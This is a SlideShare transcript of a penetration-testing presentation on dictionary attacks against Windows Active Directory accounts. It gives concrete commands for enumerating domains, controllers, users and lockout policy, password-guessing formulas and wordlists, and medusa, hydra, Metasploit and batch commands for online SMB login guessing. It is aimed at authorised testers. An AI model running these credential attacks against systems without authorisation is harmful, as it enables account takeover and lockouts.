Introduction to Windows Dictionary Attacks
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Introduction to Windows Dictionary Attacks

on

  • 1,745 views

In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered: ...

In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:

Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack

More security blogs by the authors can be found @
https://www.netspi.com/blog/

Statistics

Views

Total Views
1,745
Views on SlideShare
1,734
Embed Views
11

Actions

Likes
1
Downloads
46
Comments
0

2 Embeds 11

http://10.2.9.171 8
https://twitter.com 3

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Introduction to Windows Dictionary Attacks Presentation Transcript

  • 1. Introduction to Windows Dictionary AttacksAuthor: Scott Sutherland
  • 2. Who am I?Scott Sutherland• Principal Security Consultant @ NetSPI• Over 10 years of consulting experience• Security researcher: Blogs, white papers, tools etc
  • 3. Presentation Goals• Identify the value of dictionary attacks• Provide new penetration testers with a safe approach to Windows dictionary attacks• Provide security professionals with questions they should be asking their contractors
  • 4. Before we begin… Dictionary Attack Brute Force Attack
  • 5. Why dictionary attacks?What are the goals?• Identify accounts configured with weak or default passwords – “It’s human nature”• Use accounts as entry points during penetration testsWhat’s the impact?• Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data• User impersonation
  • 6. Are There Alternatives?Yes.Approaches typically includes:• Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper• Dumping clear text passwords for interactive sessions with Mimikatz
  • 7. Dictionary Attacks: Process OverviewWindows Dictionary Attack Process1. Identify domains2. Enumerate domain controllers3. Enumerate domain users4. Enumerate domain lockout policy5. Create a dictionary6. Perform Attack
  • 8. Identify Domains: MethodsUnauthenticated Methods• DHCP Information• NetBIOS Queries• DNS Queries• Sniffing Network Traffic• Review RDP drop down listsAuthenticated Methods• Review the output of the SET command for “USERDNSDOMAIN”• Review the registry for the default domain
  • 9. Identify Domains: Tools Method Tools Auth IPCONFIGDHCP Info NoNetBIOS Queries NETSTAT –A <IP> No nmap -sL <IP Range> -oA output_rndsDNS Queries No ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output Wireshark (GUI) + Filter for browser trafficSniffing No Network Monitor (GUI) Etherape (GUI) nmap –sS –PN –p3389 <IP Range>RDP Drop Down Then visit with RDP client No
  • 10. Enumerate DCs: MethodsUnauthenticated Methods• DNS Queries• RPC Queries• Port Scanning• NetBIOS ScanningAuthenticated Methods• NET GROUP commands• LDAP Queries
  • 11. Enumerate DCs: Tools Methods Tools Auth NSLOOKUP –type=SRV _ldap._tcp.<domain>DNS Queries No NLTEST /DCLIST <domain>RPC Queries FindPDC <domain> <request count> No NMAP –sS –p389,636 –PN <IP Range>Port Scanning No FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTATNetBIOS –A %i NoScanning Net group “Domain Controllers” /domainNET GROUP YesCommand LDAP Administrator (GUI Tool)LDAP Queries Yes Hyena (GUI Tool) & adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No | gawk -F ” ” “{print $2}” | sort | uniq
  • 12. Enumerate Domain Users: MethodsUnauthenticated Methods• RPC Queries• SID Brute Forcing• SNMP Queries• LDAP Queries• Sharepoint FuzzingAuthenticated Methods• NET USER command• WMI commands
  • 13. Enumerate Domain Users: Tools 1 Methods Tools Auth dumpsec.exe /computer=<IP> /rpt=usersonlyRPC /saveas=csv /outfile=domain_users.txt YesEndpoints & enum –N <ip> no enum –U <ip> ruby c:metasploitmsf3msfcliSID Brute auxiliary/scanner/smb/smb_lookupsid YesForcing SMBDomain=. MaxRID=10000 RHOSTS=<IP & Address> E > domain_users.txt no Getacct (GUI) ruby c:metasploitmsf3msfcliSNMP auxiliary/scanner/snmp/snmp_enumusers YesQueries SMBDomain=. RHOSTS=<IP Address> E & Mibbrowser (GUI) no SNMP Walk
  • 14. Enumerate Domain Users: Tools 2 Methods Tools Auth adfind -b DC=<victim>,DC=<com> -fLDAP Queries “objectcategory=user” -gc | grep -i Yes “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk & -F ” ” “{print $1}”| sort > domain_users.txt no Fuzz parameters with BURP to enumerate domainSharepoint users. Example URL below: YesFuzzing & https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] no Net users /domain > domain_users.txtNET USERS YesCommand wmic /user:<user> /password:<password> /node:<IPWMI address> domain_users.txt YesCommands
  • 15. Get Domain Lockout Policy: MethodsUnauthenticated Methods• RPC Endpoints LockoutAuthenticated Methods threshold: 5• NET ACCOUNTS Lockout duration: 15 Command Lockout observationWhat does it all mean? window : 15• Threshold, duration, and window
  • 16. Get Domain Lockout Policy: Tools Methods Tools AuthRPC Queries Enum –P <IP Address> Yes & dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt No NET ACCOUNTSNET YEsACCOUNTSCOMMAND
  • 17. Create a Dictionary: MethodsClassics Still Work• Blank• Username as password• passwordCommon Formulas = Most Effective• <Password><Number>• <Companyname><Number>• <Season><Year>• <Sports team>Number>Popular Dictionaries• Metasploit dictionaries• Rock you• FuzzDB• John the ripper
  • 18. Create a Dictionary: Tools Dictionary URLs / Lists Blank passwordClassics Username as password password as password <Password><Number> <Companyname><Number>Formulas <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! http://www.skullsecurity.org/wiki/index.php/PasswordsRockyou http://code.google.com/p/fuzzdb/FuzzDB https://github.com/rustyrobot/fuzzdb http://www.openwall.com/wordlists/John the Ripper
  • 19. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy• General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user• Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3• Wait 5 to 10 minutes beyond the observation window
  • 20. Perform Dictionary Attack: Tools Tools Commands OS medusa -H hosts.txt -U users.txt -P passwords.txt -Medusa T 20 -t 10 -L -F -M smbnt Linux Easy to use GUI and not CLI that I know of.Bruter Windows ruby c:metasploitmsf3msfcliMetasploit auxiliary/scanner/smb/smb_login THREADS=5 Windowssmb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E hydra.exe -L users.txt -P passwords.txt -oHydra credentials.txt <ip> smb Windows and Linux FOR /F “tokens=*” %a in (‘type passwords.txt’) doBatch Script net user <ip>IPC$ /user:<user> %a Windows
  • 21. Conclusions• There is more than one way to do everything!• Enumerate all available options• It’s easy to lockout accounts – respect the password policy • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests